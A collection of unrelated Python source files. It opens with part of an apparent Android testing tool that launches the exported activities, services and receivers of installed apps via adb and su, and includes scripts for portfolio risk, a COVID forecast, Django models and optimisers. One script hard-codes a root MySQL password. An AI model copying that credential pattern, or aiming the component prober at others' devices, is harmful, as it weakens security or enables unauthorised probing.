/data/local/tmp/busybox'\n ret = execShell(cmd)\n if 'd' in ret.keys():\n logging.info('push busybox success')\n cmd = cmd = self._adb + ' shell \"chmod +x /data/local/tmp/busybox\" '\n ret = execShell(cmd)\n return True\n else:\n return False\n return True\n\n def killMonkey(self):\n logging.info('Clean monkey')\n cmd = self._adb + ' shell \"ps -A | grep com.android.commands.monkey\" '\n ret = execShell(cmd)\n if 'd' in ret.keys():\n data = ret.get('d').split('\\n')\n for d in data:\n tmp = d.split()\n if len(tmp) == 9 and tmp[8] == 'com.android.commands.monkey':\n cmd = self._adb + ' shell \"su -c \\' kill -9 '+tmp[1]+'\\' \"'\n ret = execShell(cmd)\n if 'e' in ret.keys():\n logging.info(ret.get('e'))\n\n logging.info('Clean monkey done')\n\n def getCurActivity(self):\n cmd = self._adb + ' shell \"dumpsys activity top | grep ACTIVITY \"'\n ret = execShell(cmd)\n out = ret.get('d')\n if out:\n out = out.split('\\n')\n out = out[-2]\n out = out.split()[1]\n ret = out\n if '/.' 
in out:\n            ret = ret.replace('/', '')\n        else:\n            ret = ret.split('/')[1].strip()\n\n        return ret\n\n    def UIClick(self, p, a):\n        if p not in self.getCurActivity():\n            return\n        #some phone may not work\n        cmd = self._adb + ' shell \"/system/bin/uiautomator dump /sdcard/window_dump.xml \"'\n        ret = execShell(cmd)\n        curdir = os.path.join(os.path.dirname(os.path.abspath(__file__)), '')\n        dumpfile = curdir+'/apps/tmp/uidump.xml'\n        cmd = self._adb + ' pull /sdcard/window_dump.xml '+dumpfile\n        ret = execShell(cmd)\n\n        # clicks = parseUIDump(dumpfile)\n\n        clicks = []\n        \n        for c in clicks:\n            if p not in self.getCurActivity():\n                break\n            if c.get('class') and c.get('class').startswith('android.widget.EditText'):\n                xy = c.get('bounds')\n                xy = xy.split('][')[0]\n                xy = xy.lstrip('[')\n                x,y = xy.split(',')\n                x = int(x) + 3\n                y = int(y) + 3\n                cmd = self._adb + ' shell \"input tap {} {}\"'.format(x, y)\n                ret = execShell(cmd)\n                cmd = self._adb + ' shell \"input text tex{}{}\"'.format(x, y)\n                ret = execShell(cmd)\n                logging.info('input '+c.get('resource-id'))\n            \n            elif c.get('clickable') == 'true':\n                xy = c.get('bounds')\n                xy = xy.split('][')[0]\n                xy = xy.lstrip('[')\n                x,y = xy.split(',')\n                x = int(x) + 3\n                y = int(y) + 3\n                logging.info('click ({},{}) {}'.format(x, y, c.get('resource-id')))\n                cmd = self._adb + ' shell \"input tap {} {}\"'.format(x, y)\n                ret = execShell(cmd)\n                time.sleep(1)\n                if a not in self.getCurActivity():\n                    cmd = self._adb + ' shell \"input keyevent 4\"'\n                    ret = execShell(cmd)\n\n        return clicks\n\n\n    def monkey(self, pkg):\n        pkgs = getPkgList(pkg)\n        \n        for p in pkgs:\n            if p in self._blacklist:\n                continue\n            if p not in self._devicepkg:\n                logging.error(p+' not installed')\n                continue\n            # Check the device is online\n            if not self.checkOnline(self._did):\n                logging.error('Device offline')\n                return\n            \n            logging.info('=='+p)\n            \n            try:\n                # Prepare the APK manifest file\n                sp = self._dirapps+p\n                if os.path.isfile(sp+'.xml') and os.stat(sp+'.xml').st_size > 0:\n                    apkcook = APKCook(sp+'.xml', True)\n                else:\n                    xmlpath = self.pullXml(p)\n                    if xmlpath:\n                        apkcook = APKCook(xmlpath, True)\n                    else:\n                        logging.error('xml error'+p)\n                        return\n                \n                activity = apkcook.show('ma').split(',')\n                if len(activity) < 2:\n                    logging.info('maybe encrypted')\n\n                #timeout kill\n                timeout = 220\n                timeoutThread = threading.Thread(target=self.timeoutKIll, args=(p, timeout), daemon=True)\n                timeoutThread.start()\n\n                cmd = self._adb + ' shell \"rm /sdcard/monkeylogs/'+p+'.log\"'\n                ret = execShell(cmd)\n\n                cmd = self._adb + ' shell \"logcat -c\"'\n                ret = execShell(cmd)\n                \n                cmd = self._adb + ' shell \"logcat > /sdcard/monkeylogs/'+p+'.log.log\"'\n                logcatdameon = execShellDaemon(cmd)\n\n                UIcomponent = []\n\n                for a in activity:\n                    if not a:\n                        continue\n                    logging.info(a)\n                    cmd = self._adb + ' shell \"am start -n '+p+'/'+a+'\"'\n                    #timeout not working, because connected to pipe??\n                    execShell(cmd)\n\n                    #monkey click\n                    # cmd = self._adb + ' shell \"monkey -p '+p+' -vvv --throttle 100 --pct-syskeys 0 --ignore-crashes 133 >> /sdcard/monkeylogs/'+p+'.log \" '\n                    # execShell(cmd, 40)\n\n                    #uiautomator dump\n                    time.sleep(1)\n                    self.UIClick(p, a)\n\n                    if not timeoutThread.is_alive():\n                        timeoutThread = threading.Thread(target=self.timeoutKIll, args=(p, timeout), daemon=True)\n                        timeoutThread.start()\n\n                service = apkcook.show('ms').split(',')\n                for s in service:\n                    if not s:\n                        continue\n                    logging.info(s)\n                    cmd = self._adb + ' shell \"am start-service '+p+'/'+s+' \" '\n                    execShell(cmd, 40)\n                    time.sleep(1)\n\n                receiver = apkcook.show('mr').split(',')\n                for s in receiver:\n                    if not s:\n                        continue\n                    logging.info(s)\n                    cmd 
= self._adb + ' shell \"am broadcast '+p+'/'+s+' \" '\n execShell(cmd, 40)\n time.sleep(1)\n\n if logcatdameon.poll():\n logcatdameon.terminate()\n\n \n except KeyboardInterrupt:\n cmd = self._adb + ' shell \"am force-stop '+p+' \" '\n ret = execShell(cmd)\n raise KeyboardInterrupt\n\n except Exception as e:\n import traceback\n traceback.print_exc()\n logging.error(str(e))\n\n # cmd = self._adb + ' shell \"am force-stop '+p+' \" '\n # ret = execShell(cmd)\n \n time.sleep(0.2)\n\ndef getExposed(pkg):\n from inter.apkcookpy.lib.apk import APKCook\n if os.path.isfile(pkg) and '.apk' in pkg:\n #apk\n try:\n APKCook(pkg).show()\n except Exception as e:\n logging.error(e)\n elif os.path.isfile(pkg) and '.xml' in pkg:\n #text xml\n try:\n APKCook(pkg, True, True).show()\n except:\n #binary xml\n try:\n APKCook(pkg, True).show()\n except Exception as e:\n logging.error(e)\n\n else:\n logging.error(\"python3 amonkey.py -e test.xml|test.apk\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Android Monkey', formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog='''\n python3 amonkey.py -p com.xiaomi.music[,com.xiaomi.youpin]\n python3 amonkey.py -p plist.txt\n python3 amonkey.py -e test.xml|test.apk\n ''')\n parser.add_argument(\"-p\", \"--pkg\", type=str, help=\"app/applist\")\n parser.add_argument(\"-e\", \"--exposed\", type=str, help=\"exposed component\")\n parser.add_argument(\"-s\", \"--did\", type=str, help=\"device ID\")\n \n args = parser.parse_args()\n pkg = args.pkg\n exposed = args.exposed\n did = args.did\n\n try:\n if pkg:\n amonkey = AMonkey(did)\n amonkey.monkey(pkg)\n \n elif exposed:\n getExposed(exposed)\n\n else:\n parser.print_help()\n except KeyboardInterrupt:\n logging.info('Ctrl+C')\n","sub_path":"amonkey.py","file_name":"amonkey.py","file_ext":"py","file_size_in_byte":15001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"287134505","text":"# from selenium import webdriver\n# from bs4 import BeautifulSoup as bs\nimport pandas as pd\nimport numpy as np\nimport pymysql\nimport datetime\n# from selenium.webdriver.chrome.options import Options\nimport math\nimport sys\nimport statistics\n# etf = ['VTI','VOO','VXUS','SPY','BND','IVV','BNDX','VEA','VO',\n# 'VUG','VB','VWO','VTV','QQQ','BSV','BIV','VTIP','VOE','IEF',\n# 'SHY','TLT','IVE','VT','GOVT']\n\n\n\n\n\n\ntemp = 'SPY,IVV,VTI,VOO,QQQ,AGG,GLD,VEA,IEFA,BND,VWO,VUG,IWF,LQD,IEMG,VTV,EFA,VIG,IJH,IJR,IWM,VCIT,IWD,VGT,XLK,VO,USMV,IAU,VCSH,BNDX,IVW,HYG,VNQ,VB,ITOT,VYM,BSV,VXUS,VEU,EEM,XLV,TIP,IWB,DIA,SCHX,MBB,IXUS,SHY,SHV,IWR,IGSB,IEF,SCHF,QUAL,VV,GDX,XLF,MUB,TLT,PFF,EMB,IVE,SCHB,XLY,SDY,SLV,GOVT,MDY,BIV,XLP,VT,BIL,JPST,MINT,VBR,RSP,JNK,DVY,IWP,SCHD,VGK,ACWI,SCHP,SCHG,XLI,XLU,DGRO,VMBS,VHT,MTUM,IGIB,IEI,VBK,EFAV,XLC,IWS,GSLC,EWJ,FDN,SCHA'\ntemp_arr = temp.split(',')\netf = []\nfor i in range(100):\n etf.append(temp_arr[i])\n\ntemp = 'KO,PLD,CSX,MMC,AAPL,MSFT,AMZN,FB,GOOGL,GOOG,JNJ,V,PG,NVDA,JPM,HD,MA,UNH,VZ,DIS,ADBE,CRM,PYPL,MRK,NFLX,INTC,T,CMCSA,PFE,BAC,WMT,PEP,ABT,TMO,CSCO,MCD,ABBV,XOM,ACN,COST,NKE,AMGN,AVGO,CVX,MDT,NEE,BMY,UNP,LIN,DHR,QCOM,PM,TXN,LLY,LOW,ORCL,HON,UPS,AMT,IBM,SBUX,C,LMT,MMM,WFC,CHTR,RTX,AMD,FIS,BA,NOW,SPGI,BLK,ISRG,GILD,CAT,MDLZ,INTU,MO,ZTS,CVS,TGT,BKNG,AXP,BDX,VRTX,DE,D,ANTM,EQIX,CCI,APD,SYK,CL,TMUS,CI,GS,DUK,MS,ATVI'\ntemp_arr = temp.split(',')\nstk = []\nfor i in range(100):\n stk.append(temp_arr[i])\n\netf = stk + etf\n\nchoose1 = sys.argv[1]\nweight1 = sys.argv[2]\nchoose = choose1.split(',')\nweight = 
weight1.split(',')\nfor i in range(len(weight)):\n    weight[i] = float(weight[i])\n\n\ndate1 = int(sys.argv[3])\ndate2 = int(sys.argv[4])\ndate3 = int(sys.argv[5])\n\ntoday = datetime.date(date3,date2,date1)\n\n# today = datetime.date(2020, 8, 16)\n# choose = ['BKNG','SCHP','XLP','SBUX','PG','VZ']\n# weight = [0.16667,0.16667, 0.16667, 0.16667, 0.16667, 0.16667]\n\n# days = [30,90,365]\ndays = [21,63,252]\n\nstddevs = np.zeros(4)\nsharpes = np.zeros(4)\n# print(MDD)\n\ndb = pymysql.connect(\"localhost\", \"root\", \"esfortest\", \"etf\")\ncursor = db.cursor()\n\nsql = \"select * from close\"\ncursor.execute(sql)\nresult_select = cursor.fetchall()\ndb.commit()\ndf = pd.DataFrame(list(result_select))\n# df = df.drop([0],axis=1)\n\n\nfor a in range(len(etf)):\n    df = df.rename(columns={a+1:etf[a]})\n# print(df)\n\nfor a in range(-1,len(choose)):\n    if a==-1:\n        df2 = df[0]\n    else:\n        df2 = pd.concat([df2, df[choose[a]] ],axis=1)\n# print(df2)\n\ni=0\nwhile(True):\n    have_nan = True\n    for a in range(len(choose)):\n        if np.isnan(df2[choose[a]][i])==True: # value is NaN\n            have_nan = False\n            break\n    if have_nan==False:\n        df2 = df2.drop([i],axis=0)\n        i+=1\n    else:\n        break\n\n# print(df2)\ndf2 = df2.reset_index(drop=True)\n\n\n\ntodayyy = today\n# todayyy = datetime.date(2020, 8, 16)\ndf2 = df2.reset_index(drop=True)\n# print(df2)\nwhile (todayyy in list(df2[0]))==False and ( datetime.datetime.strptime(str(todayyy),\"%Y-%m-%d\")>datetime.datetime.strptime(str(df2[0][0]),\"%Y-%m-%d\") ):\n    todayyy -= datetime.timedelta(days=1)\n# print(start_date)\nif (todayyy in list(df2[0]))==True:\n    todayyy_index = list(df2[0]).index(todayyy) \nelse:\n    todayyy_index = 0\ndf2 = df2[:todayyy_index+1]\ndf2 = df2.reset_index(drop=True)\n\n\n# Weighted average portfolio price\ndf2['avg'] = 0\n# df2 = df2.drop(['avg'],axis=1)\nfor i in range(len(df2['avg'])):\n    for a in range(len(choose)):\n        df2.loc[i,'avg'] += df2[choose[a]][i]*weight[a]\n# print(df2)\n\n# Daily return\ndf2['day_return'] = 0 \nfor i in range(len(df2)-1):\n    df2.loc[i+1,'day_return'] = (df2['avg'][i+1] - df2['avg'][i])/df2['avg'][i]\n# print(df2)\ndf2 = df2.fillna(0)\n# Risk-free rate\nrisk_free_return = 0.01/365\n# risk_free_return = 0\n\navg_return = statistics.mean(df2['day_return'])\n# print(avg_return)\n\n# Standard deviation\n\n\n# print(df2.isnull().sum())\n# print(statistics.stdev(df2['day_return']))\nstd_dev = statistics.stdev(df2['day_return'][1:])* math.sqrt(252)\n# print(std_dev)#0.1757400215841394\nstddevs[3]=std_dev*100\n\n# Sharpe ratio\nsharpe = (avg_return-risk_free_return) / std_dev * math.sqrt(252)\n# sharpe = (avg_return) / std_dev * math.sqrt(252)\n# print(sharpe)#0.5267990017907497\nsharpes[3]=sharpe\n\ni=0\nfor d in days:\n    df3 = df2[d*(-1):]\n    df3 = df3.reset_index(drop=True)\n    std_dev = statistics.stdev(df3['day_return'][1:])* math.sqrt(252)\n    sharpe = (avg_return-risk_free_return) / std_dev * math.sqrt(252)\n    stddevs[i]=std_dev*100 \n    sharpes[i]=sharpe \n    i+=1\n    # print(std_dev)\n    # print(sharpe)\n    # print()\nstddevs2 = np.zeros(5)\nd2 = [63,126,252,204,756]\ni=0\nfor d in d2:\n    df3 = df2[d*(-1):]\n    df3 = df3.reset_index(drop=True)\n    std_dev = statistics.stdev(df3['day_return'][1:])* math.sqrt(252)\n    # sharpe = (avg_return-risk_free_return) / std_dev * math.sqrt(252)\n    stddevs2[i]=std_dev*100 \n    # sharpes[i]=sharpe \n    i+=1\n\n# Maximum drawdown\nmdds=[]\nfor d in days:\n    df3 = df2[d*(-1):]\n    df3 = df3.reset_index(drop=True)\n    df3['avg'] = 0\n    for i in range(len(df3['avg'])):\n        for a in range(len(choose)):\n            df3.loc[i,'avg'] += df3[choose[a]][i]*weight[a]\n    df3['max']=0\n    s1 = df3['avg']\n    for i in range(len(df3)):\n        
df3.loc[i,'max'] = s1[0:i+1].max() \n\n df3['dd'] = 0\n df3['dd'] = 1-(df3['avg']/df3['max'])\n\n mdd = df3['dd'].max()\n mdds.append(mdd)\n # print(mdd)\n\ndf2['max']=0\ns1 = df2['avg']\nfor i in range(len(df2)):\n df2.loc[i,'max'] = s1[0:i+1].max() \n\ndf2['dd'] = 0\ndf2['dd'] = 1-(df2['avg']/df2['max'])\n\nmdd = df2['dd'].max()\n# print(mdd)\nmdds.append(mdd)\n\n\n# print(mdds)#[0.014878441598282222, 0.08107850063969146, 0.3632447312443021, 0.3632447312443021]\n# print(stddevs)#[ 9.16611393 21.14502543 28.76564975 17.57400216]\n# print(sharpes)#[0.06835749 0.02963215 0.02178197 0.03565338]\n\nr1=[]\nr2=[]\nr3=[]\nr4=[]\nfor i in range(4):\n r1.append(format(mdds[i] , '0.5f'))\n r2.append(format(stddevs[i] , '0.3f'))\n r3.append(format(sharpes[i] , '0.5f'))\nfor i in range(5):\n r4.append(format(stddevs2[i] , '0.3f'))\n\nresult1=' '.join(r1)\nresult2=' '.join(r2)\nresult3=' '.join(r3)\nresult4=' '.join(r4)\nprint(result1)\nprint(result2)\nprint(result3)\nprint(result4)","sub_path":"functions/risk_analysis.py","file_name":"risk_analysis.py","file_ext":"py","file_size_in_byte":6155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"614693916","text":"\n\n#calss header\nclass _DOMICILED():\n\tdef __init__(self,): \n\t\tself.name = \"DOMICILED\"\n\t\tself.definitions = [u'being legally resident (= living) in a place: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_domiciled.py","file_name":"_domiciled.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"571848368","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nfrom statsmodels.tsa.holtwinters import ExponentialSmoothing\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import mean_absolute_error\nimport datetime\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\ndef percentage_error(actual, predicted):\n res = np.empty(actual.shape)\n for j in range(actual.shape[0]):\n if actual[j] != 0:\n res[j] = (actual[j] - predicted[j]) / actual[j]\n else:\n res[j] = predicted[j] / np.mean(actual)\n return res\n\ndef mean_absolute_percentage_error(y_true, y_pred): \n return np.mean(np.abs(percentage_error(np.asarray(y_true), np.asarray(y_pred)))) * 100\n\ndataset = pd.read_csv(r\"C:\\Users\\djsam\\Desktop\\ML\\Dataset\\covid19.csv\")\nX = list(dataset.columns)\nX = X[4:] #days\ny = dataset.iloc[131:132,4:].values #Confimed Patients\n\nX = np.array(X)\nX = X.astype(int)\nX = np.reshape(X,(-1, 1))\ny = np.reshape(y,(-1, 1)) #Converted y to appropriate form - y.transpose()\n\n# for i in range(len(y)):\n# if y[i,0] == 0:\n# y[i,0] = 1\n\nmodel = ExponentialSmoothing(y,trend=\"add\",damped = True, seasonal = None)\nmodel_fit = model.fit(0.3,0.1)\nyhat = model_fit.predict(start = 1, end = len(y))\nyhat = np.reshape(yhat,(-1, 1))\n\n# gsc = GridSearchCV(ExponentialSmoothing(y,trend=\"add\",damped = True, seasonal = None),\n# {\"trend\" : [\"add\", \"mul\", \"additive\", \"multiplicative\"],\n# \"damped\": [True,False]},\n# cv=5, scoring='neg_mean_squared_error', verbose=0, n_jobs=-1)\n\n# grid_result = 
gsc.fit(X,y.ravel())\n# best_params = grid_result.best_params_\n\nmodel = ExponentialSmoothing(y,trend=\"add\",damped = True, seasonal = None)\nmodel_fit = model.fit(0.3,0.1)\nyhat1 = model_fit.predict(start = 1, end = len(y)+10)\nyhat1 = np.reshape(yhat1,(-1, 1))\n\nprint(f\"RMSE = {mean_squared_error(y,yhat,squared = False)}\")\nprint(f\"MSE = {mean_squared_error(y,yhat,squared = True)}\")\nprint(f\"MAE = {mean_absolute_error(y,yhat)}\")\nprint(f\"MAPE = {mean_absolute_percentage_error(y,yhat)} \")\n\ndates = []\nfor i in range(len(yhat)):\n    dates.append(datetime.date(2020,1,22) + datetime.timedelta(i))\n\ndates10ahead = []\nfor i in range(len(yhat)+10):\n    dates10ahead.append(datetime.date(2020,1,22) + datetime.timedelta(i))\n","sub_path":"Ensemble/es.py","file_name":"es.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"633706659","text":"from django.db import models\nfrom django.forms import ModelForm\n\nfrom django.template.defaultfilters import slugify\n\nclass Page(models.Model): # Model for static and dynamic pages\n    p_titre = models.CharField(\"Titre\", max_length = 128, unique =True)\n    p_titre_slugify = models.CharField(\"Titre Slugify\", max_length = 128, blank = True, editable = False)\n    p_adresse = models.CharField(\"Adresse\", max_length =64)\n    p_mots_clefs = models.CharField(\"Mots clés\", max_length = 512, blank = True)\n    p_description = models.TextField(\"Description\")\n    p_contenu = models.TextField(\"Contenu\")\n    p_bouillon = models.BooleanField(\"Bouillon\", default = True)\n    \n    class Meta:\n        verbose_name = 'Gestion des pages'\n        verbose_name_plural = 'Gestion des pages'\n        ordering = ['p_adresse']\n    \n    def save(self, *args, **kwargs):\n        self.p_titre_slugify = slugify(self.p_titre)\n        super(Page, self).save(*args, **kwargs)\n    \n    def __unicode__(self):\n        return self.p_titre\n    def __str__(self):\n        return '%s' % (self.p_titre)\n\nclass Contact(models.Model):\n    \n    c_name = models.CharField(\"Nom du foyer\", max_length = 128)\n    c_nbPersonnes = models.IntegerField(\"Nombre de personnes\")\n    c_nomsPersonnes = models.CharField(\"Noms des personnes\", max_length = 128)\n    c_email = models.EmailField(\"Votre email\")\n    c_mdp = models.CharField(\"Tapez votre mot de passe\", max_length = 128)\n    c_numTel = models.CharField(\"Numéro de téléphone\", max_length = 128)\n    c_adresse = models.CharField(\"Adresse\", max_length = 128)\n    c_codepostal = models.CharField(\"Code postal\", max_length = 128)\n    c_ville = models.CharField(\"Ville\", max_length = 128)\n    c_pays = models.CharField(\"Pays\", max_length = 128)\n    \n    def __unicode__(self):\n        return self.c_name\n    def __str__(self):\n        return '%s' % (self.c_name)\n    \n    \nclass ContactForm(ModelForm): # Contact form bound to the model\n    class Meta:\n        model = Contact\n        fields = ['c_name','c_nbPersonnes','c_nomsPersonnes', 'c_email','c_mdp','c_numTel','c_adresse','c_codepostal','c_ville','c_pays']\n\nclass Articles(models.Model):\n    a_statut_liste=(\n        ('1','1 pers'),\n        ('2','2 pers'),\n        ('3','3 pers'),\n        ('4','4 pers'),\n        ('5','5 pers'),\n        ('6','6 pers'),\n        ('7','7 pers'),\n        ('8','8 pers'),\n        ('9','9 pers'),\n        \n    )\n    a_type_liste=(\n        ('1','1 portion'),\n        ('2','2 portions'),\n        ('3','3 portions'),\n        ('4','4 portions'),\n        ('5','5 portions'),\n        ('6','6 portions'),\n        ('7','7 portions'),\n        ('8','8 portions'),\n        ('9','9 portion'),\n    )\n    \n    # food\n    a_statut=models.CharField(\"Nombre de personne foyer\", 
max_length=16,choices=a_statut_liste,default='1')\n    a_type=models.CharField(\"Portion de riz souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type2=models.CharField(\"Portion de pates souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type3=models.CharField(\"Portion de viande souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type4=models.CharField(\"Portion de boeuf souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type5=models.CharField(\"Portion de crevette souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type6=models.CharField(\"Nombre de gel hydroalcoolique souhaité\", max_length=16,choices=a_type_liste,default='1')\n    a_type7=models.CharField(\"Portion de Jambon souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type10=models.CharField(\"Nombre de bouteille de lait souhaité\", max_length=16,choices=a_type_liste,default='1')\n    a_type11=models.CharField(\"Nombre de masque souhaité\", max_length=16,choices=a_type_liste,default='1')\n    a_type12=models.CharField(\"Nombre de boite d'oeuf souhaité\", max_length=16,choices=a_type_liste,default='1')\n    a_type13=models.CharField(\"Portion de pomme de terre souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type14=models.CharField(\"Portion de poulet souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type15=models.CharField(\"Portion de tomate souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type17=models.CharField(\"Portion de sucre souhaitée\", max_length=16,choices=a_type_liste,default='1')\n    a_type18=models.CharField(\"Nombre de pack de farine souhaitée\", max_length=10,choices=a_type_liste,default='1')\n    a_type19=models.CharField(\"Nombre de boite de thon souhaité\", max_length=10,choices=a_type_liste,default='1')\n    \n    # hygiene\n    a_type21=models.CharField(\"Nombre de pack de couches pour bébé souhaité\", max_length=10,choices=a_type_liste,default='1')\n    a_type22=models.CharField(\"Nombre de tube de dentifrice souhaité\", max_length=10,choices=a_type_liste,default='1')\n    a_type23=models.CharField(\"Nombre de pack de papier toilette souhaité\", max_length=10,choices=a_type_liste,default='1')\n    a_type24=models.CharField(\"Nombre de savon pour les mains souhaité\", max_length=10,choices=a_type_liste,default='1')\n    a_type25=models.CharField(\"Nombre de tube de shampoing souhaité\", max_length=10,choices=a_type_liste,default='1')\n    a_description=models.TextField(\"un produit à suggérer\")\n    \n    def __unicode__(self):\n        return self.c_name\n    def __str__(self):\n        return '%s' % (self.c_name)\n    \nclass ArticlesForm(ModelForm): # Contact form bound to the model\n    class Meta:\n        model = Articles\n        fields = ['a_statut','a_type','a_type2', 'a_type3','a_type4','a_type5','a_type6','a_type7','a_type10','a_type11','a_type12','a_type13','a_type14','a_type15','a_type17','a_type18','a_type19','a_type21','a_type22','a_type23','a_type24','a_type25','a_description']","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197367367","text":"import numpy as np\n\nclass UpdateStrategy:\n    @classmethod\n    def create(cls, setting):\n        name = setting.get('name')\n        kwargs = setting.get('setting') or {}\n        if name == 'momentum':\n            return Momentum(**kwargs)\n        if name in [\"rmsprop\", \"rms\"]:\n            return RMSProp(**kwargs)\n        if name == 'adagrad':\n            return Adagrad(**kwargs)\n        if name == 'adadelta':\n            return 
AdaDelta(**kwargs)\n        if name == 'adam':\n            return Adam(**kwargs)\n        if name == 'plain':\n            return UpdateStrategy(**kwargs)\n        # if name in ['nesterov_accelerated_gradient', 'nesterov_ag', 'nag']:\n        #     return NesterovAcceleratedGradient()\n        return UpdateStrategy(**kwargs)\n    @classmethod\n    def list_up(cls):\n        return [\n            'momentum',\n            # 'nag',\n            Adagrad(epsilon = 0.25),\n            'rms',\n            'adadelta',\n            'adam',\n        ]\n\n    def __init__(self, \n        *,\n        learn_rate = 0.125,\n        **__\n    ):\n        # Gradient clipping: cap on the absolute update size\n        self.grad_clipping = 0.5\n        self.learn_rate = learn_rate\n    def calc(self, diff):\n        self.last_learn = diff\n    def update(self):\n        return self.clip(-self.learn_rate * self.last_learn)\n    def clip(self, grad):\n        clp = self.grad_clipping\n        return np.clip(grad, -clp, clp)\n\nclass Momentum(UpdateStrategy):\n    # \"rate\" means the momentum coefficient; the full name is too long\n    def __init__(self, *, learn_rate = 0.125, rate = None, **kwargs):\n        super(Momentum, self).__init__(**kwargs)\n        self.last_moment = None\n        self.learn_rate = learn_rate\n        self.rate = rate or 0.05\n    def update(self):\n        upd = -self.learn_rate * self.last_learn\n        moment = self.last_moment if self.last_moment is not None else 0\n        self.last_moment = self.clip(self.rate * moment + upd)\n        return self.last_moment\n\n\nclass RMSProp(UpdateStrategy):\n    def __init__(self,\n        *,\n        learn_rate = 0.125,\n        epsilon = 0.1,\n        attenuation_rate = 0.9, # decay rate\n        **kwargs,\n    ):\n        super(RMSProp, self).__init__(**kwargs)\n        self.last_ada = 0\n        self.learn_rate = learn_rate\n        self.attn = attenuation_rate or 0.9\n        self.epsilon = epsilon or 0.1 # no idea what a good value is\n    def calc_ada(self, diff):\n        return self.attn * self.last_ada + (1 - self.attn) * diff ** 2\n    def calc(self, diff):\n        ada = self.calc_ada(diff)\n        self.last_ada = ada\n        self.last_learn = diff / np.sqrt(self.epsilon + ada)\n\nclass Adagrad(RMSProp):\n    def calc_ada(self, diff):\n        return self.last_ada + diff * diff\n    def calc(self, diff):\n        ada = self.calc_ada(diff)\n        self.last_ada = ada\n        self.last_learn = diff / (self.epsilon + np.sqrt(ada))\n\n# Needs no initial learning rate\nclass AdaDelta(RMSProp):\n    def __init__(self,\n        **kwargs,\n    ):\n        super(AdaDelta, self).__init__(**kwargs)\n        self.diff_mean = 0\n    def calc(self, diff):\n        ada = self.calc_ada(diff)\n        update_diff = -diff * np.sqrt(self.epsilon + self.diff_mean) / np.sqrt(self.epsilon + ada)\n        self.last_ada = ada\n        self.last_learn = update_diff\n    def update(self):\n        self.diff_mean = self.attn * self.diff_mean + (1 - self.attn) * (self.last_learn ** 2)\n        return self.clip(self.last_learn)\nclass Adam(RMSProp):\n    def __init__(self,\n        *,\n        learn_rate = 0.125,\n        epsilon = 0.1,\n        attenuation_rate = 0.9, # decay rate\n        **kwargs,\n    ):\n        super(Adam, self).__init__(**kwargs)\n        self.learn_rate = learn_rate\n        self.moment_first = 0\n        self.moment_second = 0\n        self.attn = attenuation_rate or 0.9\n        self.attn_multipled = self.attn\n        self.epsilon = epsilon or 0.1 # no idea what a good value is\n    def calc(self, diff):\n        mom_1 = self.attn * self.moment_first + (1 - self.attn) * diff\n        mom_2 = self.attn * self.moment_second + (1 - self.attn) * diff * diff\n        self.moment_first = mom_1\n        self.moment_second = mom_2\n    def update(self):\n        molec = self.moment_first / (1 - self.attn_multipled)\n        denomi = np.clip(self.moment_second / (1 - self.attn_multipled), 1e-7, None)\n        self.attn_multipled *= self.attn\n        return self.clip(-self.learn_rate * molec / denomi)\n\n# Not sure how to compute the gradient when forward-propagating the capital-theta weights\n# class NesterovAcceleratedGradient(Plain):\n#     # \"rate\" means the momentum coefficient; the full name is too long\n#     def __init__(self, *, rate = None):\n#         self.learn_stack = 
[]\n# self.last_moment = None\n# self.rate = rate or 0.05\n# def update(self, layer):\n# last_upd = self.last_upd \n# upd = -layer.learn_rate * np.sum(np.array(self.learn_stack), axis = 0)\n# moment = self.last_moment if self.last_moment is not None else 0\n# alpha = len(self.learn_stack) * self.rate * moment\n# theta = layer.weight + self.last_moment\n# self.last_moment = self.rate * (self.last_moment + self.last_upd) + self.last_upd - self.last_moment\n# self.last_upd = upd\n# self.learn_stack = []\n# return self.last_moment\n","sub_path":"update_strategy.py","file_name":"update_strategy.py","file_ext":"py","file_size_in_byte":5510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77115705","text":"'''\nCreated on Feb 24, 2012\n\n@author: zimp\n'''\n\nfrom PyQt4 import QtGui, QtCore\n\nclass AvailableShapesWidget(QtGui.QWidget):\n '''\n Handles and displays shapes by placing them one after another in a\n grid-like layout. Wraps shapes to fit the width of the widget and expands\n as necessary downwards with a scrollbar. Inherits from QtGui.QWidget.\n '''\n\n\n def __init__(self):\n '''\n Initialize an instance. Inherits QtGui.QWidget.\n '''\n super(AvailableShapesWidget, self).__init__()\n self.available_shapes = []\n self.init_ui()\n \n def init_ui(self):\n '''\n Helper function for __init__. Sets minimum width of widget to be 100.\n '''\n self.setMinimumWidth(100)\n \n def paintEvent(self, e):\n '''\n Paint the shapes in a list in a grid-like layout. Wraps shapes to next\n 